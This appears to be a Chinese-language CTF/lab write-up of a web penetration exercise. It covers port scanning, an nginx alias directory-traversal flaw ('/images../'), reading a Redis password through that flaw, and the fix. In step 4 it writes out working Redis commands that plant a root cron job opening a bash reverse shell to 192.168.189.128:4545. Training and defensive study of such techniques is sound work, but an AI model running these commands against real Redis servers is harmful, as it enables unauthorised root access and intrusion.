记一次web渗透做题思路解析

描述:你是一名网络安全服务工程师,现在需要你对A集团网站进行安全防护,找出其中的漏洞点。

1、对目标服务器进行信息搜集,将web站点监听的端口号和版本信息作为flag值提交,提交格式:flag{端口+版本};

由于不知道服务器的IP,扫一下

找的web站点,所以是8081端口发现为nginx服务。

2、对目标服务器进行渗透测试,将触发漏洞的关键手段作为flag值提交,提交格式:flag{*****};

先看看服务器的web有什么东西

发现没有什么,爆破一下目录试试

返回上级,发现目录穿越漏洞,这里的触发漏洞的关键手段就是/images,,.

3、对目标服务器进行渗透测试,发现目标存在数据库服务,将该数据库服务的登录密码作为flag值提交,提交格式:flag{******};

扫描端口时可以看到有一个6379端口,根据信息看的出是redis数据库

这里直接利用目录穿越漏洞得知密码

4、对目标服务器进行渗透测试,将root家目录中的flag文件内容提交,提交格式:flag{******};

设置监听端口

使用密码连接目标redis服务并尝试计划任务提权

bash 复制代码
redis-cli -h target_ip -p server_port -a redis_password
bash 复制代码
config set dir /var/spool/cron
bash 复制代码
config set dbfilename root
bash 复制代码
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.189.128/4545 0>&1\n\n"
bash 复制代码
save

服务器上线

5、对目标服务器进行渗透测试,对目标web服务存在的漏洞点进行修复,将修复时所添加的内容进行md5加密后作为flag值提交,提交格式:flag{******};

通过"images.../"访问时会被替换为别名images/.../导致目录穿越,所以只需要在location指定的别名最后添加一个斜杆即可

加密一下即可

相关推荐
网安蟹佬霸2 小时前
WAF绕过技术实战:从规则检测到编码绕过全指南(2026最新版,附Payload集与自动化脚本)
运维·安全·网络安全·架构·自动化·网安
那年窗外下的雪.2 小时前
AIDC 学习日志|第 15 天|EVPN 多归属故障收敛与撤销机制
网络·学习·php
国科安芯3 小时前
轨道供电韧性:ASP4644四通道降压架构在低轨卫星平台电源管理中的适用性分析
运维·网络·数据库·嵌入式硬件·架构·状态模式·低轨卫星星座
数据知道3 小时前
移动端渗透测试流程:Android APK 逆向与动态调试
android·web安全·网络安全
少陽君4 小时前
用于InfiniBand网络的实时终端监控器——高速互连的htop
网络
电子科技圈6 小时前
Semtech将于2026年国际物联网展(IOTE 2026)举办 LoRa®全球生态论坛
物联网·网络安全·健康医疗·制造·零售·iot·交通物流
IPdodo_6 小时前
代理 IP 服务商 SLA 怎么验?7 项指标与 Python 探测脚本实战
运维·python·网络协议·网络安全·代理ip
发量惊人的中年网工6 小时前
如何验证DDoS高防真的生效?从源站隐藏到正常访问的完整验收方法
运维·网络·数据库·ddos
GuoFeng.Wan7 小时前
深入理解经典蓝牙的L2CAP协议
网络
夜月yeyue7 小时前
SOME/IP 服务模型
linux·服务器·单片机·安全·车载系统